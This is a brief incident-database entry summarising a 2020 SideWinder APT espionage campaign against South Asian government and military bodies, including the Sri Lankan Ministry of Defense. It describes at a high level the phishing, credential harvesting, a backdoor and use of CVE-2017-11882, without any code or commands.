Cyber Incident Victim: Sri Lankan Ministry of Defense
Date:
Dec 2020
Location:
Sri Lanka
Summary
The SideWinder advanced persistent threat group conducted a cyber espionage campaign targeting military and government entities in Nepal and Afghanistan using phishing emails with regional territorial dispute lures. The attackers deployed credential-harvesting techniques, emailed backdoors, and malicious mobile applications to compromise systems and steal sensitive information. This operation aimed to gather intelligence from high-value targets through coordinated social engineering and malware distribution.
| CIA Posture | Motives | Tactics, Techniques & Procedures |
|---|---|---|
| Available to members | 3 motives | 1 technique |
| Threat Actor | Type | Location |
|---|---|---|
| 1 actor | Available to members | Available to members |
Description
The SideWinder APT group targeted government and military units in South Asia, including the Sri Lankan Ministry of Defense, using sophisticated phishing and malware techniques. They created convincing fake webmail login pages to harvest credentials and installed a backdoor to exfiltrate sensitive information. The attackers exploited the CVE-2017-11882 vulnerability in Microsoft Office to run malicious code, which collected system information and uploaded it to a command-and-control server. The campaign also included the development of mobile apps designed to gather private data, although some were still under development. The attack compromised both confidentiality and integrity, with no evidence of disruption to system availability.